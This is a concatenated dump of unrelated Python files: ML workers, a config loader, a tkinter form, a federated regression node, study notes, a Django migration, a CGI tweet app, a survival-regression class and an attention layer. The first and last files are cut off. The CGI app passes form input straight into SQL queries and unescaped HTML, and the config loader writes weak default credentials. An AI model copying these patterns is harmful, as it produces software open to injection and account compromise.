self.logger.info("subprocess {} init DONE".format(self.name))
def _engine_init(self):
self._engine = cartoongan_pt_adapter.init_model(
gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
style='Hosoda')
class CartoonganPtPaprikaFuncWorker(BaseFuncWorker):
"""CartoonganPt Paprika 引擎子进程
"""
def __init__(self, daemon=True):
super(CartoonganPtPaprikaFuncWorker, self).__init__(daemon)
# 引擎功能函数注册信息
self._func_info_list = [{
"func_group": "__art_cartoon", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "ppk", "vip": 1,
"icon": "/static/ui_data/modules/ctg/paprika.jpg",
"func_class": "fc_art",
"func_name": "paprika",
"func_params": []
}]
}]
# 以下注册 FUN 标签页功能
self._func_info_list.append({
"func_group": "__fun", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "ppk", "vip": 0,
"sex": "all",
"icon": "/static/ui_data/modules/ctg/paprika.jpg",
"func_class": "fc_fun",
"func_name": "paprika",
"func_params": []
}]
})
self._task_filters = self._get_tasks_filter()
self._func_process_image = cartoongan_pt_adapter.process_image
self.logger.info("subprocess {} init DONE".format(self.name))
def _engine_init(self):
self._engine = cartoongan_pt_adapter.init_model(
gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
style='Paprika')
class CartoonganPtShinkaiFuncWorker(BaseFuncWorker):
"""CartoonganPt Shinkai 引擎子进程
"""
def __init__(self, daemon=True):
super(CartoonganPtShinkaiFuncWorker, self).__init__(daemon)
# 引擎功能函数注册信息
self._func_info_list = [{
"func_group": "__art_cartoon", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "snk", "vip": 1,
"icon": "/static/ui_data/modules/ctg/shinkai.jpg",
"func_class": "fc_art",
"func_name": "shinkai",
"func_params": []
}]
}]
# 以下注册 FUN 标签页功能
self._func_info_list.append({
"func_group": "__fun", # 必须在预定义类型中,否则将被拒绝注册
"func_list": [{
"name": "snk", "vip": 0,
"sex": "all",
"icon": "/static/ui_data/modules/ctg/shinkai.jpg",
"func_class": "fc_fun",
"func_name": "shinkai",
"func_params": []
}]
})
self._task_filters = self._get_tasks_filter()
self._func_process_image = cartoongan_pt_adapter.process_image
self.logger.info("subprocess {} init DONE".format(self.name))
def _engine_init(self):
self._engine = cartoongan_pt_adapter.init_model(
gpu_id=app_config.ENGINE_CONFIG['cartoongan_pt']['gpu_id'],
style='Shinkai')
|
996,813 | d4285afd7c255ffefdccfbc6b216032d48dd593a | import os
import configparser
class config:
"""
config.ini object
config -- list with ini data
default -- if true, we have generated a default config.ini
"""
config = configparser.ConfigParser()
fileName = "" # config filename
default = True
# Check if config.ini exists and load/generate it
def __init__(self, __file):
"""
Initialize a config object
__file -- filename
"""
self.fileName = __file
if (os.path.isfile(self.fileName)):
# config.ini found, load it
self.config.read(self.fileName)
self.default = False
else:
# config.ini not found, generate a default one
self.generateDefaultConfig()
self.default = True
# Check if config.ini has all needed the keys
def checkConfig(self):
"""
Check if this config has the required keys
return -- True if valid, False if not
"""
try:
# Try to get all the required keys
self.config.get("db","host")
self.config.get("db","username")
self.config.get("db","password")
self.config.get("db","database")
self.config.get("db","pingtime")
self.config.get("server","server")
self.config.get("server","host")
self.config.get("server","port")
self.config.get("server","localizeusers")
self.config.get("server","outputpackets")
self.config.get("server","outputrequesttime")
self.config.get("server","timeouttime")
self.config.get("server","timeoutlooptime")
if (self.config["server"]["server"] == "flask"):
# Flask only config
self.config.get("flask","threaded")
self.config.get("flask","debug")
self.config.get("flask","logger")
self.config.get("ci","key")
return True
except:
return False
# Generate a default config.ini
def generateDefaultConfig(self):
"""Open and set default keys for that config file"""
# Open config.ini in write mode
f = open(self.fileName, "w")
# Set keys to config object
self.config.add_section("db")
self.config.set("db", "host", "localhost")
self.config.set("db", "username", "root")
self.config.set("db", "password", "")
self.config.set("db", "database", "ripple")
self.config.set("db", "pingtime", "600")
self.config.add_section("server")
self.config.set("server", "server", "tornado")
self.config.set("server", "host", "0.0.0.0")
self.config.set("server", "port", "5001")
self.config.set("server", "localizeusers", "1")
self.config.set("server", "outputpackets", "0")
self.config.set("server", "outputrequesttime", "0")
self.config.set("server", "timeoutlooptime", "100")
self.config.set("server", "timeouttime", "100")
self.config.add_section("flask")
self.config.set("flask", "threaded", "1")
self.config.set("flask", "debug", "0")
self.config.set("flask", "logger", "0")
self.config.add_section("ci")
self.config.set("ci", "key", "changeme")
# Write ini to file and close
self.config.write(f)
f.close()
|
996,814 | ccbc13aa937ad176d6a0bd0ae5a83b554a0e0694 | from tkinter import *
class Application(Frame):
def __init__ (self, master):
Frame.__init__(self, master)
self.grid()
self.create_widget()
def create_widget(self):
Label(self, text='Enter student information.').grid(row=0, column=0, columnspan=3, sticky=S)
Label(self, text='Student Name:').grid(row = 1, column=0, sticky=W)
Label(self, text='GPA:').grid(row=2, column=0, sticky=W)
Label(self, text='Essay:').grid(row=3, column=0, sticky=W)
self.student_name = Entry (self, width = 40)
self.student_name.grid (row=1, column=1, columnspan=2, sticky=W)
self.student_gpa = Entry (self, width=40)
self.student_gpa.grid(row=2, column=1, columnspan=2, sticky=W)
self.essay = Text (self, width = 50, height = 10, wrap = WORD)
self.essay.grid(row=4, column =0, columnspan = 3, sticky = W)
Button (self, text = 'Save', command = self.save).grid (row=5, column=0, columnspan = 2, sticky = S)
Button (self, text = 'Clear', command=self.clear).grid(row=5, column=2, sticky=W)
def clear(self):
self.student_name.delete(0, END)
self.student_gpa.delete(0, END)
self.essay.delete(0.0, END)
def save(self):
try:
write_file = open("applications.txt", "a")
write_file.write(self.student_name.get() + "\t")
write_file.write(self.student_gpa.get() + "\t")
write_file.write(self.essay.get(0.0, END))
write_file.write("\n")
write_file.close()
except:
self.essay.delete(0.0, END)
self.essay.insert(0.0, "Error writing to file.")
# main
root = Tk()
root.title("College Application")
root.geometry("410x280")
app = Application(root)
root.mainloop()
|
996,815 | 74dc6caa4735201a2a74b9520b4173c78b9b8e1c | from csl.node import Node
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import json
import time
from threading import Thread
class Central_Node(Node):
gradients_all_sites = []
current_coefficients = []
global_gradients = []
second_nodes = []
def __init__(self, outcome_variable, data=pd.DataFrame(), data_file=None):
super().__init__(outcome_variable, data, data_file)
self.current_coefficients = np.zeros((self.covariates.shape[1], 1))
self.global_gradient = np.zeros((self.covariates.shape[1], 1))
self.second_nodes = []
# calculated using local data and using MLE function
def get_optimized_coefficients(self):
results = minimize(self.calculate_log_likelihood, self.current_coefficients,
method='L-BFGS-B', tol=1e-6)
return results["x"] * 0
def append_second_node(self, node):
self.second_nodes.append(node)
def calculate_log_likelihood(self, coefficients):
logit = self.get_logit(coefficients)
# uses formula 2 for calculations
return (np.sum(np.log(1 + np.exp(logit))) - np.asscalar(np.dot(np.transpose(self.outcomes), logit))) \
/ len(self.outcomes)
def calculate_node_gradient(self, node, coefficients):
self.gradients_all_sites.append(node.calculate_log_likelihood_gradient(coefficients))
def get_node_results(self, coefficients):
for node in self.second_nodes:
node_calculation_thread = Thread(target=self.calculate_node_gradient, args=(node, coefficients,))
node_calculation_thread.start()
def calculate_global_gradient(self):
self.gradients_all_sites = []
# get gradients from all nodes
self.get_node_results(self.current_coefficients)
central_gradient = self.calculate_log_likelihood_gradient(self.current_coefficients)
self.gradients_all_sites.append(central_gradient)
# 1 which is added to the number of second nodes means the central server
while len(self.gradients_all_sites) != len(self.second_nodes) + 1:
time.sleep(0.1)
gradients_sum = np.zeros((self.covariates.shape[1], 1))
for node_gradient in self.gradients_all_sites:
gradients_sum = np.add(gradients_sum, node_gradient)
# uses part in brackets of formula (3) for calculations
self.global_gradient = central_gradient - (gradients_sum / len(self.gradients_all_sites))
def calculate_surrogare_likelihood(self, coefficients):
# calculation according to formula 3
return self.calculate_log_likelihood(coefficients) - np.asscalar(np.dot(coefficients, self.global_gradient))
def get_vectors_difference(self, vector1, vector2):
if len(vector1) == len(vector2):
return pow(sum((vector1 - vector2) ** 2), 0.5)
else:
return np.nan
# minimize function is used since maximized function is not present among optimization methods
# therefore don't be surprised to see that I change the original approach
# instead of log-likelihood maximization I minimize -log-likelihood
def calculate_global_coefficients(self, log_file, is_odal=False, result_file=None):
# get the best coefficients based on only central-server data
self.current_coefficients = self.get_optimized_coefficients()
with open(log_file, "w") as file:
file.write("Coefficients before iterations start are: {}\n".format(self.current_coefficients))
# it calculates the gradient term which is inside the bracket in formula (3) Take into account that it required to
# be calculated only once
if not is_odal:
max_iterations = 50
max_delta = 1e-3
converged = False
final_number_of_iterations = max_iterations
running_time = 0
with open(log_file, "a") as file:
if is_odal:
start_time = time.time()
self.calculate_global_gradient()
# make an update as in formula (3), gradient is saved into class variable and used inside hte formula
# coefficients are passed as parameter because they would be optimized inside the code
self.current_coefficients = \
minimize(self.calculate_surrogare_likelihood, self.current_coefficients,
method='L-BFGS-B', tol=1e-6)["x"]
running_time = time.time() - start_time
else:
start_time = time.time()
for iteration in range(0, max_iterations):
self.calculate_global_gradient()
# make an update as in formula (3), gradient is saved into class variable and used inside hte formula
# coefficients are passed as parameter because they would be optimized inside the code
previous_coefficients = self.current_coefficients
optimization_results = minimize(self.calculate_surrogare_likelihood,
self.current_coefficients, method='L-BFGS-B', tol=1e-6)
self.current_coefficients = optimization_results["x"]
if self.get_vectors_difference(self.current_coefficients, previous_coefficients) < max_delta:
running_time = time.time() - start_time
converged = True
final_number_of_iterations = iteration
break
if result_file != None:
with open(result_file, "w") as file:
data = {}
if not is_odal:
data["iterations"] = final_number_of_iterations
data["is_converged"] = converged
data["running_time"] = running_time
data["coefficients"] = {}
coefficient_index = 0
for covariate in self.covariates.columns:
data["coefficients"][covariate] = \
self.current_coefficients[coefficient_index]
coefficient_index += 1
file.write(json.dumps(data, indent=4))
|
996,816 | 0e959128ef0d92f6696708ad93b5b8d0d6e5e945 |
# a = [12,13,14,12,12,14,13,12,14,15]
# print(a.count(14))
# li = [5,6,7,9,-1,4,67,89,100,34,12]
# print(li[:-4:-1])
#
# print(li[:4])
# print(li[4:])
# print(li[4::-1])
# print(li[-1:-4:-1])
# print(li[-4:])
# # print(li[::-1])
# print(li[-1:-4]) #输出[]
# print(li[-2:])
# print(li[2:4])
# a = [20,10,40,30]
# a.sort()
# print(a)
#
# b= [20,10,40,30]
# c=sorted(b)
# print(c)
#
# e = [5,2,3,1,5,4]
# f = sorted(e,reverse=True)#降序
# print(f)
"""深浅拷贝"""
#浅拷贝
# li = [1,2,3]
# li2 = li.copy()
# print(id(li)==id(li2))
# li2[0]=100
# print(li)
#浅拷贝
# import copy
# li = [[1,2],[3,4]]
# li2 = copy.copy(li)
# print(id(li)==id(li2))
# li2[0][0]=80
# print(li)
#深 不会影响原对象的值
# li = [[1,2],[3,4]]
# li2 = copy.deepcopy(li)
# li2[0][0] = 666
# print(li)
# print(li2)
#字典使用
# a = {'name':'陈丽','age':18,'job':'teacher'}
# c = dict(name='张伟',age=19)
# print(c)
#zip函数创建字典
# x = ['name','age','job']
# y = ['陈丽','18','teacher']
# e = dict(zip(x,y))
# print(e)
#用 fromkeys 创建'值为空'的字典
# h = dict.fromkeys(['name','age','job'])
# print(h)
#用 items 获取‘所有的键值对’
# print(a.items())
# for i in a.items():
# print(i)
#列出所得有‘键’:keys,列出所得有‘值’:values
# a1=a.keys()
# print(a1)
# a2=a.values()
# print(a2)
#字典更新update
# b = dict([('job','Python'),('weight',75),('height',170)])
# print(b)
# a.update(b)
# print(a)
# a = {'name1':'陈丽','name2':'黄伟','name3':'阿亮','name4':'荣哥'}
# q,b,c,d=a.keys()
# print(q)
# l,m,n,o = a.values()
# print(l)
# print(type(l))
#格式化输出
# print('{1}-{0}'.format(1,2))
#集合
"""集合的作用
1 去重:把一个列表变成集合,就自动去重了。
2 关系测试:测试两组数据之前的交集、差集、并集等关系。
特征:
1、集合使用 set 表示;
2、集合也使用{ }表示,与字典不同的是:字典中存储的是键值对,集合中存储
的是单一的元素;
3、注意 1:x = { }表示的是空字典,不表示集合; 4、注意 2:x = set()可以创建空集合;
4.集合中的元素----无序性
"""
# x={1,2,3,4,6,8,12}
# x.add(23)
# x.remove(1)
# print(x)
#
# y=x.pop()
# print(y)
#返回当前集合的差集
# a1 = {1,6,8}
# a2 = {6,9,10}
# df = a1.difference(a2)
# print(df)
#返回两个集合的交集
# s = {1,2,3}
# t = {2,3,4}
# n=s.intersection(t)
# print(n)
#返回两个集合的并集
# s = {1,2,3}
# t = {2,3,4}
# n1=s.union(t)
# print(n1)
#返回集合的对称差集
# s = {1,2,3}
# t = {2,3,4}
# n2=s.symmetric_difference(t)
# print(n2)
#isdisjoint():判断当前集合与参数集合,是否交集为空;是返回 True, 否返回 False
# s = {1,2,3}
# t = {2,3,4}
# u = {4,5,6}
#
# print(s.isdisjoint(t))
# print(s.isdisjoint(u))
#issubset():判断当前集合是否为参数集合的子集;是返回 True,否 返回 False
# s = {1,2,3}
# t = {2,3,4}
# u = {1,2,3,4,5,6}
# print(s.issubset(t))
# print(s.issubset(u))
#in:判断某个元素是否在集合中
# s = {1,2,3,4}
# t=5 in s
# print(t)
#返回两个集合的交集
# s = {1, 2, 3, 4, 5}
# t = {4, 5, 6, 7}
# q=s & t
# print(q)
#集合推导式
# s = {i for i in range(10)}
# print(s)
#元组
tuple2 = ('5', '4', '8')
#求最大值
t1=max(tuple2)
print(t1)
#求最小值
t2=min(tuple2)
print(t2) |
996,817 | 7249f147052267f5369d523bdaa2f707454286af | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import array
from bisect import *
from collections import *
import fractions
import heapq
from itertools import *
import math
import random
import re
import string
import sys
N, M = map(int, input().split())
if N == M:
print("Yes")
else:
print("No")
|
996,818 | 24f90f5de02df5eebfef1ad2f7ec2c6d1cadd30a | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-06 15:16
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('header', models.CharField(max_length=128, verbose_name='заголовок')),
('text', models.TextField(verbose_name='текст')),
('date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='дата публикации')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='автор')),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('follows_to', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL, verbose_name='блоги')),
('subscriber', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='подписчик')),
],
),
migrations.CreateModel(
name='Viewed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('posts', models.ManyToManyField(to='blog.Post')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
996,819 | a181cade60d9df91867eda22522dcc60031f4cf4 | #!/usr/bin/python
# Import the CGI, string, sys modules
import cgi, string, sys, os, re, random
import cgitb; cgitb.enable() # for troubleshooting
import sqlite3
import session
import time
import datetime
#Get Databasedir
MYLOGIN="wang1247"
DATABASE="/homes/"+MYLOGIN+"/PeteTwitt/pete_twitt.db"
IMAGEPATH="/homes/"+MYLOGIN+"/PeteTwitt/images/"
##############################################################
def personal_homepage(user, target_user, session):
html=""
conn = sqlite3.connect(DATABASE)
c = conn.cursor()
c.execute("SELECT * FROM tweets WHERE owner='{0}' ORDER BY tweetid DESC".format(target_user))
rows =c.fetchall()
c.execute("SELECT firstname, lastname FROM users WHERE handle='{0}'".format(target_user))
row = c.fetchone()
html += """
<h2>{2}'s Personal Homepage</h2>
<h3>{0} {1} @{2}</h3>
""".format(row[0], row[1], target_user)
for row in rows:
if row[4] != -1:
continue
c.execute('SELECT path FROM pictures WHERE tweetid = {0}'.format(row[0]))
pic_row = c.fetchone()
if pic_row:
path = pic_row[0]
image_url="pete_twitt.cgi?action=show_image&path={path}".format(path=path)
html += '<image src="'+image_url+'" height="250" >'
time = datetime.datetime.fromtimestamp(row[3]).strftime('%Y-%m-%d %H:%M:%S')
messages="""
<h3>
<div style="color:{1}; font-family:'{2}'">{3}</div>
{4} by @{0}
</h3>
""".format(row[2], row[5], row[6], row[1], time)
html += messages
c.execute('SELECT word, owner FROM tweets WHERE replyto = {0} ORDER BY tweetid'.format(row[0]))
replys = c.fetchall()
for rrow in replys:
rhtml = """
<h4 style="text-indent: 20px;">
@{0} {1}
</h4>
""".format(rrow[1], rrow[0])
html += rhtml
reply_form = """
<form action="pete_twitt.cgi" method=POST>
<input type=hidden name="user" value={user}>
<input type=hidden name="session" value={session}>
<INPUT TYPE=hidden NAME="action" VALUE="reply">
<input type=hidden name="tweetid" value={tid}>
<input type=text size=50 name=reply>
<input type=submit value="reply">
</form>
""".format(user=user, session=session, tid=row[0])
retweet_button = """
<INPUT TYPE="submit" VALUE="Retweet"
onclick="window.location='pete_twitt.cgi?user={0}&session={1}&action={2}&tweetid={3}';"/>
<br>========================================<br>
""".format(user, session, "retweet", row[0])
html += reply_form
html += retweet_button
conn.close()
print_html_content_type()
print(html)
##############################################################
def print_html_content_type():
print("Content-Type: text/html\n\n")
##############################################################
form = cgi.FieldStorage()
user=form["user"].value
session=form["session"].value
target_user=form["target"].value
personal_homepage(user, target_user, session) |
996,820 | fddcf5f097b956ab6715a93545dfc5e4598f73df |
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn import linear_model
#various new tools we'll be using for this week! :0
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestRegressor
url = 'https://github.com/millenopan/DGMI-Project/blob/master/insurance.csv?raw=true'
data = pd.read_csv(url)
#sex
le = LabelEncoder()
le.fit(data.sex.drop_duplicates())
data.sex = le.transform(data.sex)
# smoker or not
le.fit(data.smoker.drop_duplicates())
data.smoker = le.transform(data.smoker)
#region
le.fit(data.region.drop_duplicates())
data.region = le.transform(data.region)
X = data.drop(['charges'], axis = 1)
y = data.charges
X_train,X_test,y_train,y_test = train_test_split(X,y, test_size=0.2, random_state=83)
rf = RandomForestRegressor(n_estimators = 200, n_jobs = -1)
# n_estimators = 200 means 200 trees, n_jobs = -1 uses all your CPU cores to compute them
rf.fit(X_train,y_train)
rf_pred_train = rf.predict(X_train)
rf_pred_test = rf.predict(X_test)
def predict(age, sex, bmi, children, smoker, region):
sex = sex.lower()
smoker = smoker.lower()
region = region.lower()
if sex == "female":
num_sex = 0
else:
num_sex = 1
if smoker == "yes":
num_smoker = 1
else:
num_smoker = 0
if region == "southwest":
num_region = 3
elif region == "southeast":
num_region =2
elif region == "northwest":
num_region = 1
else:
num_region = 0
return rf.predict(np.array([age, num_sex, bmi, children, num_smoker, num_region]).reshape(1, -1))
|
996,821 | fd5a46f0ccee2706734e830e59f4d2dec89ed01f | from rest_framework.pagination import PageNumberPagination
class StandardResultsSetPagination(PageNumberPagination):
"""
Classe personalizada para gerenciar a paginacao.
http://www.django-rest-framework.org/api-guide/pagination/#pagenumberpagination
"""
page_size = 100
page_query_param = "page"
page_size_query_param = "pageSize"
max_page_size = 1000
|
996,822 | 7599016f5254a03d1692059c44e870e1cc84090e | import re
from autograd import jacobian
from autograd import grad
import autograd.numpy as np
from scipy.stats import uniform
from surpyval import round_sig, fs_to_xcn
from scipy.special import ndtri as z
from surpyval import nonparametric as nonp
from copy import deepcopy, copy
import matplotlib.pyplot as plt
from scipy.optimize import approx_fprime
class Regression():
"""
Result of ``.fit()`` or ``.from_params()`` method for every parametric surpyval
distribution.
Instances of this class are very useful when a user needs the other functions
of a distribution for plotting, optimizations, monte carlo analysis and numeric
integration.
"""
def __repr__(self):
dist_params = self.params[0:self.k_dist]
reg_model_params = self.params[self.k_dist:]
dist_param_string = '\n'.join(['{:>10}'.format(name) + ": "
+ str(p) for p, name in zip(dist_params, self.distribution.param_names)
if name not in self.fixed])
reg_model_param_string = '\n'.join(['{:>10}'.format(name) + ": "
+ str(p) for p, name in zip(reg_model_params, self.reg_model.phi_param_map)
if name not in self.fixed])
if hasattr(self, 'params'):
out = ('Parametric Regression SurPyval Model'
+ '\n===================================='
+ '\nKind : {kind}'
+ '\nDistribution : {dist}'
+ '\nRegression Model : {reg_model}'
+ '\nFitted by : MLE'
).format(kind=self.kind,
dist=self.distribution.name,
reg_model=self.reg_model.name)
out = (out + '\nDistribution :\n'
+ '{params}'.format(params=dist_param_string))
out = (out + '\nRegression Model :\n'
+ '{params}'.format(params=reg_model_param_string))
return out
else:
return "Unable to fit values"
def phi(self, X):
return self.reg_model.phi(X, *self.phi_params)
def sf(self, x, X):
r"""
Surival (or Reliability) function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the survival function will be calculated
Returns
-------
sf : scalar or numpy array
The scalar value of the survival function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the survival function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.sf(2)
0.9920319148370607
>>> model.sf([1, 2, 3, 4, 5])
array([0.9990005 , 0.99203191, 0.97336124, 0.938005 , 0.8824969 ])
"""
if type(x) == list:
x = np.array(x)
return self.model.sf(x, X, *self.params)
def ff(self, x, X):
r"""
The cumulative distribution function, or failure function, for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the failure function (CDF) will be calculated
Returns
-------
ff : scalar or numpy array
The scalar value of the CDF of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the CDF at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.ff(2)
0.007968085162939342
>>> model.ff([1, 2, 3, 4, 5])
array([0.0009995 , 0.00796809, 0.02663876, 0.061995 , 0.1175031 ])
"""
if type(x) == list:
x = np.array(x)
return self.model.ff(x, X, *self.params)
def df(self, x, X):
r"""
The density function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the density function will be calculated
Returns
-------
df : scalar or numpy array
The scalar value of the density function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the density function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.df(2)
0.01190438297804473
>>> model.df([1, 2, 3, 4, 5])
array([0.002997 , 0.01190438, 0.02628075, 0.04502424, 0.06618727])
"""
if type(x) == list:
x = np.array(x)
return self.model.df(x, X, *self.params)
def hf(self, x, X):
r"""
The instantaneous hazard function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the instantaneous hazard function will be calculated
Returns
-------
hf : scalar or numpy array
The scalar value of the instantaneous hazard function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the instantaneous hazard function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.hf(2)
0.012000000000000002
>>> model.hf([1, 2, 3, 4, 5])
array([0.003, 0.012, 0.027, 0.048, 0.075])
"""
if type(x) == list:
x = np.array(x)
return self.model.hf(x, X, *self.params)
def Hf(self, x, X):
r"""
The cumulative hazard function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the cumulative hazard function will be calculated
Returns
-------
Hf : scalar or numpy array
The scalar value of the cumulative hazard function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the cumulative hazard function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.Hf(2)
0.008000000000000002
>>> model.Hf([1, 2, 3, 4, 5])
array([0.001, 0.008, 0.027, 0.064, 0.125])
"""
if type(x) == list:
x = np.array(x)
return self.model.hf(x, X, *self.params)
def random(self, size, X):
r"""
A method to draw random samples from the distributions using the parameters found in the ``.params`` attribute.
Parameters
----------
size : int
The number of random samples to be drawn from the distribution.
X : scalar or array like
The value(s) of the stresses at which the random
Returns
-------
random : numpy array
Returns a numpy array of size ``size`` with random values drawn from the distribution.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> np.random.seed(1)
>>> model.random(1)
array([8.14127103])
>>> model.random(10)
array([10.84103403, 0.48542084, 7.11387062, 5.41420125, 4.59286657,
5.90703589, 7.5124326 , 7.96575225, 9.18134126, 8.16000438])
"""
if (self.p == 1) and (self.f0 == 0):
return self.dist.qf(uniform.rvs(size=size), *self.params) + self.gamma
elif (self.p != 1) and (self.f0 == 0):
n_obs = np.random.binomial(size, self.p)
f = self.dist.qf(uniform.rvs(size=n_obs), *self.params) + self.gamma
s = np.ones(np.array(size) - n_obs) * np.max(f) + 1
return fs_to_xcn(f, s)
elif (self.p == 1) and (self.f0 != 0):
n_doa = np.random.binomial(size, self.f0)
x0 = np.zeros(n_doa) + self.gamma
x = self.dist.qf(uniform.rvs(size=size - n_doa), *self.params) + self.gamma
x = np.concatenate([x, x0])
np.random.shuffle(x)
return x
else:
N = np.random.multinomial(1, [self.f0, self.p - self.f0, 1. - self.p], size).sum(axis=0)
N = np.atleast_2d(N)
n_doa, n_obs, n_cens = N[:, 0], N[:, 1], N[:, 2]
x0 = np.zeros(n_doa) + self.gamma
x = self.dist.qf(uniform.rvs(size=n_obs), *self.params) + self.gamma
f = np.concatenate([x, x0])
s = np.ones(n_cens) * np.max(f) + 1
# raise NotImplementedError("Combo zero-inflated and lfp model not yet supported")
return fs_to_xcn(f, s)
def neg_ll(self):
r"""
The the negative log-likelihood for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
neg_ll : float
The negative log-likelihood of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.neg_ll()
262.52685642385734
"""
if not hasattr(self, 'data'):
raise ValueError("Must have been fit with data")
return self._neg_ll
def bic(self):
r"""
The the Bayesian Information Criterion (BIC) for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
bic : float
The BIC of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.bic()
534.2640532196908
References:
-----------
`Bayesian Information Criterion for Censored Survival Models <https://www.jstor.org/stable/2677130>`_.
"""
if hasattr(self, '_bic'):
return self._bic
else:
self._bic = self.k * np.log(self.data['n'][self.data['c'] == 0].sum()) + 2 * self.neg_ll()
return self._bic
def aic(self):
r"""
The the Aikake Information Criterion (AIC) for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
aic : float
The AIC of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.aic()
529.0537128477147
"""
if hasattr(self, '_aic'):
return self._aic
else:
self._aic = 2 * self.k + 2 * self.neg_ll()
return self._aic
def aic_c(self):
r"""
The the Corrected Aikake Information Criterion (AIC) for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
aic_c : float
The Corrected AIC of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.aic()
529.1774241879209
"""
if hasattr(self, '_aic_c'):
return self._aic_c
else:
k = len(self.params)
n = self.data['n'].sum()
self._aic_c = self.aic() + (2*k**2 + 2*k)/(n - k - 1)
return self._aic_c
|
996,823 | a9148072db6d1b9d679e3ea8d67bf28e5e2a2174 | """
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.jointnet.attention2d import MultiHeadAttention2D, conv_for_sequence
def expand(img_seq, expansion):
if expansion < 2:
return img_seq
new_seq = []
for idx in range(img_seq.shape[1]):
new_seq.append(img_seq[:, idx:(idx + 1)].expand((-1, expansion, -1, -1, -1)).contiguous())
return torch.cat(new_seq, dim=1)
class EncoderLayer2D(nn.Module):
def __init__(self, h, w, channels, expansion
, q_out_channels, q_kernel, q_stride, q_padding
, k_out_channels, k_kernel, k_stride, k_padding
, v_out_channels, v_kernel, v_stride, v_padding
, transform_kernel, transform_stride, transform_padding
, ff_out_channels, ff_kernel, ff_stride, ff_padding):
super().__init__()
# input size is (B, S, C, H, W)
self.h_0, self.w_0 = h, w
self.expansion = expansion
self.mha2d = MultiHeadAttention2D(q_in_channels=channels
, q_out_channels=q_out_channels
, q_kernel=q_kernel
, q_stride=q_stride
, q_padding=q_padding
, k_in_channels=channels
, k_out_channels=k_out_channels
, k_kernel=k_kernel
, k_stride=k_stride
, k_padding=k_padding
, v_in_channels=channels
, v_out_channels=v_out_channels
, v_kernel=v_kernel
, v_stride=v_stride
, v_padding=v_padding
, transform_kernel=transform_kernel
, transform_stride=transform_stride
, transform_padding=transform_padding)
self.h_1, self.w_1 = (self.h_0 - v_kernel + 2 * v_padding) // v_stride + 1\
, (self.w_0 - v_kernel + 2 * v_padding) // v_stride + 1
